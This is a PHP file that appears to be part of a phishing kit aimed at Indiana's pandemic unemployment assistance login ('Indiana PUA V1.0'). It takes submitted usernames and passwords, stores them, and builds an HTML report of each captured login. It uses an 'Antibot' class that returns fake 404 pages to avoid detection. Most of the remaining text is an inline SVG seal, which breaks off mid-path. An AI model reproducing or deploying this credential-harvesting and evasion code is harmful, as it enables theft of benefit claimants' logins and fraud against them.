<?php

    session_start();

    require_once './Classes/Comp.php';
    require_once './Classes/Antibot.php';

    $comps = new Comp;
    $antibot = new Antibot;

    $settings = $comps->settings();
    
    if (!$comps->checkToken()) {
        echo $antibot->throw404();
        die();
    }

    if (isset(
        $_POST['username'],
        $_POST['password']
    )) {
        $_SESSION['username'] = $_POST['username'];
        if ($comps->checkEmpty(
            $_POST['username'],
            $_POST['password']
        )) {
            echo $antibot->throw404();
            die();
        } else {
            $content = '
    
                <meta name="viewport" content="width=device-width, initial-scale=1.0">

                <style>

                    * {
                        font-family: Arial;
                        font-weight: normal;
                        color: rgb(14, 37, 55);
                        margin: 0;
                        padding: 0;
                    }

                    .text-center {
                        text-align: center;
                    }

                    .small {
                        font-size: .8rem;
                    }

                    .mt-05 {
                        margin-top: .5rem;
                    }

                    .mt-1 {
                        margin-top: 1rem;
                    }

                    .mt-2, .my-2 {
                        margin-top: 2rem;
                    }

                    .mt-3 {
                        margin-top: 3rem;
                    }

                    .my-3 {
                        margin: 3rem 0;
                    }

                    .mb-2, .my-2 {
                        margin-bottom: 2rem;
                    }

                    .text-light {
                        color: #8E9ABD;
                    }

                    .usa-logo > svg {
                        width: 100%;
                    }

                    .container {
                        padding-left: 1.5rem;
                        padding-right: 1.5rem;
                    }

                    hr {
                        border: none;
                        margin-top: 1rem;
                        margin-bottom: 1rem;
                        height: 1px;
                        background-color: #DEE2E6;
                    }


                </style>

                <div class="text-center my-2">
                    <h4 class="text-light">Indiana PUA V1.0</h4>
                    <h2>(1) Login from ' . $_SESSION['username'] . '</h2>
                    <div class="usa-logo mt-1">
                        <svg version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 1024 1024" style="enable-background:new 0 0 1024 1024;" width="100px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:bx="https://boxy-svg.com">
                            <style type="text/css">
                            .st0{fill:#0D2538;}
                            .st1{fill:#FFFFFF;}
                            .st2{fill:#0E2537;}
                            .st3{fill:#0E2538;}
                            .st4{fill:#D3D5D2;}
                            .st5{fill:#FEFEFD;}
                            .st6{fill:#AAABA6;}
                            .st7{fill:#2D588F;}
                            .st8{fill:#2C588F;}
                            .st9{fill:#2C5890;}
                            .st10{fill:#ABABA2;}
                            .st11{fill:#A9ABA6;}
                            .st12{fill:#B9BAB5;}
                            .st13{fill:#0E2438;}
                            </style>
                            <path d="M 1017.241 512 C 1017.241 791.037 791.037 1017.241 512 1017.241 C 232.963 1017.241 6.759 791.037 6.759 512 C 6.759 232.963 232.963 6.759 512 6.759 C 791.037 6.759 1017.241 232.963 1017.241 512 Z M 512 20.909 C 240.778 20.909 20.909 240.778 20.909 512 C 20.909 783.222 240.778 1003.091 512 1003.091 C 783.222 1003.091 1003.091 783.222 1003.091 512 C 1003.091 240.778 783.222 20.909 512 20.909 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(255, 255, 255);"/>
                            <circle style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(14, 37, 55);" cx="512" cy="512" r="512"/>
                            <path d="M 1024 512 C 1024 794.77 794.77 1024 512 1024 C 229.23 1024 0 794.77 0 512 C 0 229.23 229.23 0 512 0 C 794.77 0 1024 229.23 1024 512 Z M 512 6.759 C 232.963 6.759 6.759 232.963 6.759 512 C 6.759 791.037 232.963 1017.241 512 1017.241 C 791.037 1017.241 1017.241 791.037 1017.241 512 C 1017.241 232.963 791.037 6.759 512 6.759 Z" style="stroke-width: 2px; vector-effect: non-scaling-stroke; fill: rgb(14, 37, 55);"/>
                            <path class="st1" d="M 384.041 22.841 C 425.841 12.141 468.941 6.241 512.041 6.741 C 548.341 6.241 584.541 10.341 619.941 18.041 C 701.041 35.541 777.441 73.741 840.341 127.641 C 890.641 170.641 932.441 223.541 962.441 282.441 C 987.941 332.241 1004.841 386.341 1012.441 441.741 C 1015.941 464.941 1016.941 488.441 1017.241 511.841 C 1016.741 516.541 1017.041 521.141 1016.941 525.841 C 1014.841 614.941 988.341 703.341 941.041 778.941 C 898.541 847.241 839.441 905.141 770.341 946.341 C 698.741 989.141 616.341 1013.641 532.941 1016.741 C 525.941 1017.341 518.841 1016.541 511.841 1017.241 C 504.841 1016.441 497.741 1017.341 490.741 1016.741 C 432.741 1014.541 375.141 1002.041 321.341 980.141 C 257.141 954.041 198.341 914.441 150.041 864.741 C 96.641 810.141 55.841 742.941 31.841 670.241 C 18.341 628.841 10.041 585.641 7.541 542.141 C 6.541 527.441 7.041 512.641 6.941 497.941 C 8.041 451.341 15.841 404.841 29.741 360.341 C 49.041 298.841 80.341 241.041 121.341 191.241 C 153.341 152.241 191.241 118.041 233.241 90.241 C 279.341 59.741 330.541 36.841 384.041 22.841 M 491.041 21.141 C 418.841 24.041 347.241 43.341 283.341 77.141 C 196.041 122.941 123.141 195.841 77.341 283.241 C 40.141 353.341 20.441 432.641 20.941 511.941 C 20.541 569.441 30.941 627.041 50.741 681.041 C 76.341 750.941 118.241 814.841 171.941 866.341 C 216.541 909.341 269.441 943.641 326.841 967.041 C 377.741 987.741 432.141 999.841 487.041 1002.541 C 536.941 1004.941 587.241 1000.241 635.541 987.441 C 678.741 976.341 720.341 959.141 758.741 936.741 C 825.441 898.041 882.741 843.341 924.541 778.541 C 974.641 701.441 1002.541 609.841 1002.941 517.841 C 1004.841 417.041 973.941 316.041 916.541 233.241 C 877.441 176.441 826.341 128.041 767.441 92.241 C 694.741 47.741 610.141 22.741 524.841 20.841 C 513.641 20.941 502.341 20.641 491.041 21.141 Z"/>
                            <path class="st1" d="M 512.2 244.7 C 513.9 250.3 513.4 256.3 513.4 262.1 C 513.4 335.8 513.4 409.4 513.4 483.1 C 513.5 508 513.1 532.8 513.6 557.7 C 487.2 588.2 460.4 618.3 434 648.8 C 461.5 641.6 488.5 631.9 514.2 619.6 C 526.7 613.8 538.8 607.2 550.8 600.5 C 573.4 587.6 595.6 573.9 617.9 560.6 C 620.8 558.7 623.6 556.5 626.3 554.3 C 627.7 553.2 629 552 630.3 550.9 C 637.6 544.6 644.2 537.5 651 530.7 C 652.4 529.3 653.8 527.9 655.2 526.5 C 659.1 522.8 663.4 518.7 668.9 517.6 C 672.7 517.2 676.3 520 677.4 523.5 C 679.1 527.9 676.8 532.7 674.2 536.2 C 668.1 543.8 659.8 549.3 651.7 554.6 C 648.9 556.4 646 558.1 643 559.8 C 635.8 563.8 628.6 567.6 621.2 571.1 C 614.2 574.2 608 578.7 601.4 582.5 C 586.8 591.4 571.9 599.8 556.6 607.5 C 543.1 614.7 529.3 621.3 515.3 627.6 C 514.1 628.1 513 628.7 511.8 629.3 L 511 628.6 L 511.4 629.5 L 511 629.7 C 508.8 630.7 506.5 631.7 504.3 632.9 C 487.4 639.6 470.7 647 453.3 652.5 C 444.4 655.6 435.2 658 426.1 660.5 C 422.2 661.4 419.9 664.9 417.4 667.7 C 397.8 690.4 377.9 712.8 358.2 735.4 C 355.9 738.4 353.1 741 350.3 743.4 C 358 718.6 366.3 693.9 374.3 669.2 C 369.3 669.9 364.2 669.5 359.2 670.1 C 353.5 670.6 347.8 669.6 342 669.6 C 322.9 668.1 303.1 664.3 287.4 652.8 C 276.5 645.1 269.2 632.6 267.8 619.3 C 267.3 610.6 267.6 601.7 270.1 593.3 C 276 571.1 288.4 551.3 301.8 532.9 C 312.2 519 323.7 505.8 335.9 493.4 C 335.9 497.4 335.5 501.4 334.8 505.4 C 322 518.7 310.2 532.8 299.9 548.1 C 289.4 564 280.6 581.3 277.4 600.2 C 275.9 611.1 276.5 622.7 281.9 632.6 C 288.6 645.4 301.8 653.4 315.3 657.3 C 335.4 663.1 356.6 662.7 377.2 660.5 C 379.3 653.3 382.1 646.2 384.1 639 L 384 639.1 L 384.3 638.3 C 384.9 636.8 385.5 635.3 386 633.8 C 388.6 626.1 390.7 618.2 393.6 610.6 L 393.9 610.4 L 393.6 610.3 C 394.5 608.1 395.4 606 396.3 603.8 L 395.3 604.2 L 395.6 603.5 C 401.7 586.5 406.8 569.2 412.6 552.1 C 413.3 550 414.1 547.9 414.7 545.8 C 416.6 540 418.4 534.3 420.3 528.5 C 422.1 523.8 423.9 519 424.9 514.1 C 427.9 505.4 430.5 496.6 433.6 488 C 434.1 486.6 434.6 485.1 435.1 483.6 C 439.1 470.4 443.4 457.3 447.9 444.2 C 448.4 442.8 448.8 441.3 449.3 439.8 C 453.6 426.1 458.1 412.5 462.6 398.9 C 463.1 397.5 463.6 396 464.1 394.6 C 467.4 382.7 472.1 371.3 475 359.3 L 475.1 358.8 L 475.8 360.1 C 476.1 358.8 476.3 357.5 476.7 356.2 C 477.8 351.7 479.4 347.3 480.9 342.9 C 481.4 341.4 481.9 339.9 482.3 338.4 C 491.8 306.8 501.9 275.7 512.2 244.7 Z"/>
                            <path class="st1" d="M 877.4 253.2 C 884.8 251.6 893 253.3 898.9 258.1 C 904.7 263 908.7 270.3 908.8 277.9 C 908.6 285.7 905.2 293.3 899.5 298.5 C 893 304.2 884.7 308.5 875.9 307.6 C 860.4 307.8 848.2 291.1 852.1 276.4 C 854.7 264.4 865.7 255.7 877.4 253.2 M 883.5 260.8 C 874.1 264.2 865 269.9 858.9 278 C 853.2 285.7 858.2 297.5 867.1 300.1 C 871.6 301 876.2 300.1 880.3 298.2 C 886.4 295.4 892.2 291.7 897.2 287.2 C 900.9 283.4 904.8 278.4 903.7 272.8 C 902.5 267.3 898.6 261.8 892.9 260.3 C 889.8 259.4 886.6 260 883.5 260.8 Z"/>
                            <path class="st1" d="M 259.2 335.2 C 261.1 333.9 264.6 334.3 264.8 337 C 265.7 339.5 262.8 341.8 260.4 340.8 C 258.1 340.1 258.1 337 259.2 335.2 Z"/>
                            <path class="st1" d="M 76.5 483.25 C 82.6 502.35 88.9 521.55 94.7 540.75 C 88.6 537.15 82.5 533.45 76.5 529.75 C 70.5 533.45 64.3 537.15 58.3 540.75 C 64.1 521.55 70.3 502.45 76.5 483.25 Z"/>
                            <path class="st1" d="M 947.6 483.2 C 953.8 502.3 959.8 521.5 965.9 540.6 C 959.6 537.4 953.6 533.4 947.6 529.8 C 941.6 533.6 935.4 537.1 929.4 540.8 C 935.1 521.5 941.5 502.4 947.6 483.2 Z"/>
                            <path class="st1" d="M 484.2 923.4 C 492.8 923 501.4 924.1 510 923.9 C 514.8 923.9 519.5 924.6 524.3 924.4 C 524.1 930.3 524.4 936.2 524.7 942.1 C 523.8 942.1 522.1 942.1 521.2 942.1 C 520.4 937.3 519.7 931.3 514.8 929 C 510.4 927.2 505.6 927.5 501 927.6 C 499.8 927.4 499.1 928.8 498.9 929.8 C 498.5 935.2 499.1 940.6 498.4 946 C 501.2 945.5 504.4 945.7 506.6 943.7 C 508.7 942 508.9 939.1 509.6 936.7 C 510.5 936.7 512.2 936.8 513 936.8 C 512 944 512.5 951.3 512.4 958.6 C 511.6 958.6 510 958.6 509.2 958.6 C 508.6 955.7 508.2 952.4 505.6 950.6 C 503.4 949.4 500.8 949.3 498.3 948.8 C 498.2 953.8 498.5 958.8 498 963.9 C 497.9 965.5 497.7 967.3 498.5 968.7 C 500.7 970.1 503.5 969.3 506 969.5 C 505.9 970.7 505.9 971.8 505.8 973 C 498.1 973.4 490.5 972.8 482.8 972.6 C 482.8 971.4 482.8 970.2 482.8 969 C 485 969 487.2 969 489.4 969 C 490.5 960.4 490.5 951.7 490.5 943 C 490.9 937.8 491.2 932.6 490.5 927.4 C 488.3 927.2 486.1 927.1 484 927 C 484.2 926 484.2 924.3 484.2 923.4 Z"/>
                            <path class="st2" d="M 651 75 C 656.4 76.7 662.8 77.6 666.5 82.4 C 668.9 86.4 667.1 91.3 665.2 95.1 C 663.8 98.2 660.5 100.2 657.1 100 C 652.3 99.7 647.6 98.2 643.2 96.4 C 646 89.4 647.5 81.8 651 75 Z"/>
                            <path class="st2" d="M 682.9 117.9 C 688.4 112.7 693.9 107.6 699.1 102.2 C 699.3 109.8 698.4 117.4 698.6 125 C 693.3 122.7 688.2 120.1 682.9 117.9 Z"/>
                            <path class="st2" d="M 187.9 188 C 192.7 182.7 198.2 176.1 206.2 176.6 C 215.1 178.7 221.6 186 227.2 192.8 C 231.1 197.5 234.4 204.3 231.1 210.2 C 228.4 214.7 224.1 218 220.2 221.5 C 218.1 220.2 216.2 218.4 214.6 216.5 C 205.8 206.9 196.3 197.9 187.9 188 Z"/>
                            <path class="st2" d="M 883.5 260.8 C 886.5 259.9 889.8 259.4 892.9 260.3 C 898.6 261.8 902.5 267.2 903.7 272.8 C 904.8 278.4 901 283.5 897.2 287.2 C 892.2 291.7 886.4 295.4 880.3 298.2 C 876.2 300.1 871.5 301 867.1 300.1 C 858.3 297.5 853.2 285.7 858.9 278 C 865 269.9 874.1 264.2 883.5 260.8 Z"/>
                            <path class="st2" d="M 908.3 325.1 C 914.5 322.5 920.3 319.2 926.7 317.2 C 928.4 318.7 929.1 321 930.1 322.9 C 931.6 326.3 933.4 330 932.3 333.8 C 930.3 338.2 925.5 339.9 921.1 341 C 913.5 339.4 910.8 331.5 908.3 325.1 Z"/>
                            <path class="st2" d="M 299.8 547.8 C 310.1 532.5 322 518.4 334.7 505.1 C 331.8 553.6 350 603.3 384.2 637.8 L 383.9 638.6 L 384 638.5 C 381.9 645.8 379.1 652.8 377.1 660 C 356.5 662.2 335.3 662.7 315.2 656.8 C 301.7 652.9 288.5 644.9 281.8 632.1 C 276.4 622.3 275.8 610.6 277.3 599.7 C 280.5 581.1 289.4 563.7 299.8 547.8 Z"/>
                            <path class="st2" d="M 82.9 616.5 C 91 614.4 99 611.6 107.2 609.8 C 109.6 615.6 112.6 622.8 108.7 628.7 C 104.1 635 96 636.7 88.9 638.5 C 83.7 639.7 77.2 640.2 73.2 635.9 C 69.7 631.8 68.7 626.2 67.8 621.1 C 72.7 619.2 77.8 618 82.9 616.5 Z"/>
                            <path class="st2" d="M 877.4 711 C 879.1 705.9 881.6 700.7 886.1 697.5 C 890.9 697.4 896.3 699.5 898.3 704.3 C 899.2 709.8 895.8 714.7 893.3 719.3 C 888 716.6 882.5 714.1 877.4 711 Z"/>
                            <path class="st2" d="M 123 708.7 C 129.1 705.9 134.9 702.4 141.2 700 C 143.7 704.4 147.2 709.1 146.6 714.5 C 144.9 719.4 139.5 721.2 135 722.6 C 128.4 720.9 125.6 714.2 123 708.7 Z"/>
                            <path class="st2" d="M 864.2 738.2 C 871.2 737.8 877.5 742.2 883.1 746 C 888.8 750.3 895.4 756.2 894.4 764.1 C 893.3 768.6 890.1 772.8 885.7 774.5 C 880.8 776.6 875.5 774.1 871.1 771.9 C 864.6 768.1 858 763.6 854.2 756.9 C 850.2 749.5 856 739.3 864.2 738.2 Z"/>
                            <path class="st2" d="M 136.9 744.7 C 143.4 743.4 150 742.2 156.4 740.8 C 152.7 746.2 149 751.6 145.2 756.9 C 141.9 753.3 139.8 748.8 136.9 744.7 Z"/>
                            <path class="st2" d="M 172.2 781.6 C 177 778.2 181.3 774.1 186.2 770.9 C 190.2 774.1 193.8 778.7 194.8 783.9 C 193.7 789 188.2 793.4 182.9 792.4 C 178.1 790.3 175.1 785.7 172.2 781.6 Z"/>
                            <path class="st2" d="M 785.4 825.4 C 787.8 823.7 791.2 823.6 793.4 825.6 C 796.2 827.8 799.2 831.1 798.5 834.9 C 797.1 840.1 792.3 843.4 788.3 846.5 C 784.6 842 780.3 837.9 777 833 C 779 829.7 782.2 827.4 785.4 825.4 Z"/>
                            <path class="st2" d="M 451.4 923.4 C 458.5 920.4 468 925 469.1 932.9 C 470.5 942.5 469.6 953 464.6 961.4 C 460.1 969.5 446.5 968.6 442.7 960.4 C 439.1 953 440.7 944.5 442.2 936.8 C 443.4 931.5 446 925.7 451.4 923.4 Z"/>
                            <path class="st1" d="M 517 50 C 524.4 46.7 533.9 48.2 539.8 53.8 C 540.7 52.4 541.6 51 542.5 49.6 C 543.7 49.6 544.9 49.6 546.1 49.6 C 546.1 56.3 546.1 62.9 546.1 69.6 C 545.3 69.6 543.7 69.6 542.9 69.6 C 541.5 65.2 540.3 60.4 536.8 57.1 C 533.1 53 527 51.4 521.6 52.7 C 517.2 53.6 514 58.5 515.3 62.9 C 517.7 68.1 523.7 69.9 528.8 71.3 C 534.3 73 540.5 73.9 544.6 78.3 C 549 82.9 549.1 90.1 547.6 95.9 C 546.1 100.2 542.5 103.7 538.2 105.2 C 530.1 107.9 520.5 106.5 514 100.8 C 512.9 102.4 511.7 104 510.6 105.6 C 509.9 105.6 508.5 105.5 507.8 105.5 C 507.8 97.9 507.8 90.4 507.8 82.8 C 508.6 82.8 510.3 82.8 511.1 82.8 C 512.5 88.3 514 94.3 518.3 98.3 C 522.9 102.7 530.2 103.6 536.1 101.3 C 542.3 98.9 544 89.9 539.3 85.3 C 530.4 80 518.3 80.8 511.2 72.6 C 506.7 65.4 508.7 53.7 517 50 Z"/>
                            <path class="st1" d="M 389 65.7 C 403.9 62 419 58.8 434 55.2 C 435.9 62.1 438.2 69 440 75.9 C 439.2 76.1 437.6 76.5 436.8 76.7 C 434.5 72 433 66.6 428.8 63.2 C 425.4 60.6 420.8 61.3 417.3 63.1 C 417.9 70.2 420.1 77 421.6 83.9 C 423.8 92.3 425 101 427.9 109.2 C 430.6 108.7 433.3 108.2 436 107.5 C 436.4 108.8 436.7 110.1 437.1 111.4 C 428.5 113.6 419.7 115.3 411.1 117.5 C 410.7 116.2 410.4 114.9 410.1 113.6 C 413 112.9 415.8 112.1 418.5 111.1 C 418 106.3 416.6 101.7 415.5 97.1 C 413.3 87.8 411.3 78.4 409 69.1 C 408.6 67.7 407.9 66.3 407.2 65 C 404.1 65.7 400.7 66.2 398.5 68.7 C 395.7 71.6 396 75.9 395.7 79.6 C 395.9 81.9 396 84.1 396 86.4 C 395.2 86.5 393.6 86.8 392.8 86.9 C 391.6 79.7 390.3 72.7 389 65.7 Z"/>
                            <path class="st1" d="M 591 57.1 C 599 54.5 608.2 57.6 613.6 64 C 614.8 62.8 616 61.6 617.2 60.4 C 618.3 60.5 619.4 60.7 620.4 60.8 C 619.2 67.5 618.5 74.3 617.5 81 C 616.4 80.8 615.3 80.6 614.1 80.4 C 613.6 73.8 611.6 66.2 605.4 62.7 C 601.5 60.5 596.5 59.1 592.3 61.3 C 589.5 62.8 588 66.1 587.9 69.1 C 588.6 73.1 592.1 75.7 595.4 77.6 C 601.7 81.1 609.5 82.9 614.2 88.7 C 619.6 96.9 616.5 110.3 607 114.1 C 597.8 116.8 587 114.1 580.8 106.7 C 579.6 108.1 578.4 109.6 577.1 110.9 C 576.3 110.8 574.7 110.7 573.9 110.6 C 575.4 103.2 576 95.7 577.6 88.3 C 578.7 88.5 579.9 88.6 581 88.8 C 580.9 96.1 583 104.3 589.5 108.5 C 594 110.9 599.8 112.3 604.6 109.9 C 610.1 107.4 612.3 98.7 607.3 94.6 C 600.7 89.9 592.5 87.9 586.1 82.9 C 577.3 76.3 580.8 60.3 591 57.1 Z"/>
                            <path class="st1" d="M 634.7 69.3 C 635.1 68 635.6 66.7 636 65.4 C 645.3 68.7 654.6 71.8 664 74.9 C 669.1 76.6 674.2 79.9 675.9 85.3 C 677.5 91.2 675.7 98 671.1 102.1 C 668.6 104.2 665.3 104.9 662.1 105.2 C 655 105.3 648.3 102.8 641.8 100.3 C 640.2 106.3 637.6 112.1 636.1 118.1 C 636.7 121.3 641.3 121 643.7 122.3 C 643.2 123.6 642.8 124.9 642.3 126.2 C 634.2 123.6 626.2 120.5 618 118 C 618.5 116.7 619 115.4 619.5 114.1 C 621.7 114.9 624 115.6 626.2 116.4 C 630.2 110.3 631 102.7 634 96 C 636.3 87.9 640 80.2 641.3 71.9 C 639.2 70.9 637 70.1 634.7 69.3 M 651 75 C 647.5 81.8 646 89.4 643.1 96.4 C 647.5 98.2 652.2 99.7 657 100 C 660.4 100.2 663.8 98.2 665.1 95.1 C 667.1 91.3 668.8 86.4 666.4 82.4 C 662.8 77.6 656.4 76.7 651 75 Z"/>
                            <path class="st1" d="M 355.5 75.2 C 356.8 75.3 358.5 74 359.4 75.3 C 370.4 88.1 381.3 101 392.3 113.7 C 393.3 114.8 394.3 115.8 395.4 116.8 C 397 116.4 398.6 116 400.2 115.5 C 400.7 116.7 401.1 118 401.6 119.3 C 394.3 122 386.9 124.5 379.5 126.9 C 379.1 125.6 378.6 124.3 378.2 123.1 C 380.6 122.1 383 121.2 385.4 120.1 C 383 116.1 379.9 112.6 376.9 109 C 370.6 111.1 364.3 113.4 357.9 115.3 C 357.7 119.1 356.9 123.2 358.4 126.8 C 360.4 129.6 363.8 127.7 366.4 127 C 366.8 128.3 367.3 129.5 367.7 130.8 C 361.3 133.3 354.8 135.2 348.4 137.4 C 348 136.2 347.6 134.9 347.3 133.7 C 349.4 132.5 352.2 131.6 352.6 128.9 C 353.4 125 353.6 120.9 353.6 117 C 354.3 103 355 89.1 355.5 75.2 M 359.2 88 C 358.7 95.5 358.4 103 358 110.5 C 363.4 108.8 368.8 107 374.2 105.1 C 369.1 99.6 364.3 93.7 359.2 88 Z"/>
                            <path class="st1" d="M 283.8 109 C 297.6 102.1 311.2 94.8 325 88 C 328.4 94.3 332.2 100.3 335.7 106.5 C 334.7 107.1 333.8 107.7 332.8 108.3 C 329.6 104.1 326.6 99.4 321.8 96.9 C 318 95.3 313.9 97.3 310.5 99.2 C 310.7 100.3 311.1 101.4 311.4 102.5 C 317.2 114.3 323.4 125.8 329.3 137.6 C 330 139 330.8 140.4 332 141.4 C 334.6 140.6 337 139.3 339.5 138.1 C 340.1 139.3 340.8 140.6 341.4 141.9 C 333.4 145.8 325.5 150 317.6 154 C 317 152.7 316.4 151.4 315.8 150.1 C 318.2 148.8 321.1 148.1 322.8 145.9 C 322.5 142.8 320.4 140.3 319.1 137.6 C 316.1 131.6 313.2 125.6 310 119.7 C 307.2 114.5 305.1 108.9 301.5 104 C 297.3 105.2 293.2 108.1 292.4 112.7 C 292 117.7 294 122.4 295.3 127.2 C 294.6 127.6 293.1 128.5 292.4 129 C 289.8 122.2 286.7 115.6 283.8 109 Z"/>
                            <path class="st1" d="M 686.4 108.5 C 692.4 102.3 699 96.7 704.9 90.4 C 705.9 90.9 706.9 91.4 707.9 91.9 C 707.2 110.4 706.1 129 705.8 147.6 C 707.3 148.6 708.8 149.6 710.3 150.5 C 709.8 151.7 709.2 152.9 708.7 154.1 C 701.6 150.8 694.4 147.7 687.3 144.4 C 687.9 143.1 688.5 141.9 689.1 140.6 C 691.5 141.5 693.8 143.4 696.5 142.9 C 697.3 138.5 697.7 134.1 697.6 129.6 C 691.7 126.6 685.5 124.1 679.6 121.3 C 676.5 124.3 672.5 127.1 671.6 131.7 C 673.4 133.2 675.4 134.5 677.6 135.5 C 677.1 136.8 676.5 138.2 676 139.5 C 669.9 136.5 663.6 134 657.5 130.9 C 658.1 129.7 658.7 128.6 659.3 127.4 C 661.8 128.2 664.7 129.3 666.9 127.3 C 673.8 121.3 680.1 114.8 686.4 108.5 M 682.9 117.9 C 688.2 120.1 693.3 122.7 698.6 124.9 C 698.4 117.3 699.3 109.7 699.1 102.1 C 693.8 107.6 688.3 112.7 682.9 117.9 Z"/>
                            <path class="st1" d="M 268.5 117.6 C 269.2 117.3 270.5 116.6 271.2 116.3 C 275 121.9 279.1 127.2 282.8 132.9 C 282.1 133.3 280.6 134.2 279.9 134.7 C 275.1 130 268.4 126 261.5 127.5 C 257.4 128.7 252.9 131 251.1 135.1 C 249 139.5 252.2 145.3 257 145.9 C 267.1 147 275.9 139 286 140.8 C 293.6 142.7 298.7 150.4 299 158 C 297.9 170.3 284.5 177.9 273 176.5 C 273.1 178.5 273.2 180.5 273.3 182.4 C 272.5 182.9 271.6 183.5 270.8 184 C 266.5 177.8 262.3 171.5 258.3 165.1 C 259.1 164.6 260.6 163.7 261.3 163.2 C 265.7 167.9 271.4 172 278 172.4 C 283.8 171.8 289.8 168.9 292.5 163.5 C 295.1 158.7 292.3 152.5 287.7 150.1 C 284 148.6 280.1 150.3 276.6 151.4 C 269.5 153.8 261.7 156.8 254.3 154.4 C 247.2 150.6 243.2 141.1 246.8 133.6 C 250.7 125.8 260.1 121.9 268.5 123.1 C 268.5 121.4 268.5 119.5 268.5 117.6 Z"/>
                            <path class="st1" d="M 736.9 120.8 C 742.7 117.8 749.6 116.2 756 118.3 C 762.9 120.3 768.7 125.7 771 132.6 C 773.4 131.2 776 130 778.6 131.8 C 775 138.5 771 145 767.2 151.7 C 766.4 151.3 764.9 150.5 764.1 150.1 C 766.9 143.4 769.2 134.9 764.4 128.5 C 761.9 124.6 757.2 123.2 752.9 122.2 C 749.5 123.1 746.1 124.1 743.4 126.5 C 736.8 132.2 732.1 139.8 728.7 147.7 C 726.7 152.6 726 158.8 729.6 163.2 C 732.6 166.8 737 169.9 741.9 169.8 C 748.1 170.1 753.1 165.9 757.4 162.1 C 758.4 163 759.5 163.9 760.5 164.8 C 756.1 169.6 750.4 173.9 743.7 174 C 736.6 174.6 729.8 170.8 725.2 165.6 C 718.9 157.8 718.3 146.5 722.2 137.5 C 725.3 130.7 730.4 124.7 736.9 120.8 Z"/>
                            <path class="st1" d="M 788 144.3 C 788.8 143.3 789.7 142.2 790.6 141.2 C 802 151 813.3 160.9 824.6 170.8 C 820.5 176.1 816.6 181.5 812.2 186.5 C 811.3 185.7 810.4 184.8 809.5 184 C 812.2 179.6 815.3 174.4 813.8 169 C 811 163.4 805.9 159.5 800.9 156 C 795.7 160.4 791.8 166 787.2 171 C 790 173 793.1 175.8 796.9 175.1 C 799.3 174.3 801.2 172.5 803.3 171.1 C 804.3 171.8 805.2 172.5 806.2 173.3 C 800.7 179.5 795.2 185.7 789.9 192.1 C 789 191.4 788 190.7 787.1 190 C 788.5 187.2 790.7 184.2 789.9 180.8 C 789.1 177.9 786.8 175.8 784.7 173.8 C 780.8 178.6 776.7 183.1 772.7 187.8 C 771.9 188.8 770.9 189.8 770.8 191.1 C 772.5 194.4 775.7 196.5 778.4 198.9 C 781.7 201.3 785.4 204.4 789.9 203.5 C 794.6 202.3 798.4 199.1 802.1 196.2 C 802.9 197.1 803.8 197.9 804.6 198.8 C 799.5 203.8 794.5 208.8 789.8 214.1 C 777.9 203.9 766 193.5 754.2 183.3 C 755.2 182.3 756.1 181.3 757.1 180.3 C 759 181.9 760.9 183.5 763 185 C 768.1 180.1 772.4 174.5 777.2 169.2 C 782.6 162.8 788.3 156.7 793.5 150.1 C 791.7 148 789.9 146.1 788 144.3 Z"/>
                            <path class="st1" d="M 203 170.8 C 211.4 167.9 220.6 171.4 226.7 177.3 C 234 183.7 240.2 192.7 239.1 202.8 C 238.6 210.8 232.4 216.6 226.6 221.5 C 221.5 226.8 215.9 231.6 210.7 236.8 C 209.7 235.8 208.7 234.8 207.8 233.7 C 209.8 232 211.6 230.1 213.1 228 C 205.4 219 196.8 211 188.9 202.2 C 186.5 199.9 184.3 197.3 181.7 195.3 C 179 195.1 177.3 198 175.3 199.5 C 174.3 198.6 173.4 197.6 172.4 196.7 C 176.5 192.6 180.9 188.9 184.8 184.8 C 190.6 179.8 195.4 173.1 203 170.8 M 187.9 188 C 196.3 197.9 205.8 206.9 214.6 216.5 C 216.2 218.4 218 220.2 220.2 221.5 C 224.1 218 228.4 214.7 231.1 210.2 C 234.5 204.3 231.1 197.5 227.2 192.8 C 221.6 185.9 215.1 178.7 206.2 176.6 C 198.3 176.1 192.8 182.7 187.9 188 Z"/>
                            <path class="st1" d="M 848.7 200.1 C 849.7 199.2 850.7 198.2 851.7 197.3 C 861.4 208.8 871.5 220 881.1 231.5 C 876.5 236.3 871.5 240.7 866.8 245.3 C 865.9 244.4 865 243.5 864.1 242.7 C 867 239.2 870 235.4 870.7 230.8 C 871.1 227.4 869.2 224.4 867.2 221.8 C 864.8 218.8 862.5 215.5 859.1 213.6 C 853.9 217.6 849 222.1 844 226.5 C 846.3 228.6 848.4 231.5 851.8 231.8 C 854.8 232 857.4 230.2 860 228.8 C 860.7 229.7 861.4 230.6 862.1 231.6 C 855.9 237.1 849.7 242.6 843.3 247.8 C 842.6 246.8 841.9 245.8 841.2 244.8 C 843.3 242.7 844.8 240.1 845.9 237.3 C 844.9 234.2 843.2 231.4 841.3 228.8 C 835.9 234.1 829.6 238.5 824.4 244 C 826 246.4 827.9 248.5 829.7 250.7 C 828.7 251.7 827.8 252.6 826.8 253.6 C 821 247 815.2 240.5 809.7 233.8 C 810.8 233 811.9 232.1 813 231.3 C 814.6 233.3 816.3 235.1 818.2 236.7 C 827.5 229.6 835.9 221.5 844.9 214 C 847.7 211.5 850.7 209.1 853.3 206.3 C 851.7 204.1 850.2 202.1 848.7 200.1 Z"/>
                            <path class="st1" d="M 133.3 245.1 C 142.5 233.2 151.9 221.5 161.1 209.6 C 166.6 213.4 172 217.4 177.6 221.2 C 176.8 222.2 176.1 223.2 175.3 224.2 C 170.4 221.9 164.5 218.2 159.1 221.1 C 154.2 224.5 150.4 229.3 147.7 234.6 C 152.7 239.1 158 243.2 163.5 247.1 C 165 244.6 166.7 242.1 167.1 239.1 C 166.9 235.7 164.3 233.4 162.2 231 C 163 230.1 163.9 229.2 164.7 228.4 C 171.2 233.4 177.6 238.5 184.1 243.5 C 183.4 244.5 182.7 245.5 182 246.4 C 179.5 245.3 177.1 243.5 174.2 243.5 C 170.7 244 168.5 247 166.1 249.3 C 171.9 254 177.7 258.8 183.8 263.1 C 188.9 258.9 192.9 253.2 195.4 247.1 C 196.6 240.7 191.1 235.9 187.7 231.2 C 188.4 230.3 189.1 229.4 189.7 228.5 C 195.1 233.2 200.4 237.9 205.8 242.5 C 196.4 254.9 186.5 267 177 279.4 C 175.9 278.6 174.8 277.8 173.7 277 C 175.1 275 176.6 273 177.9 271 C 174.8 267.1 170.5 264.5 166.7 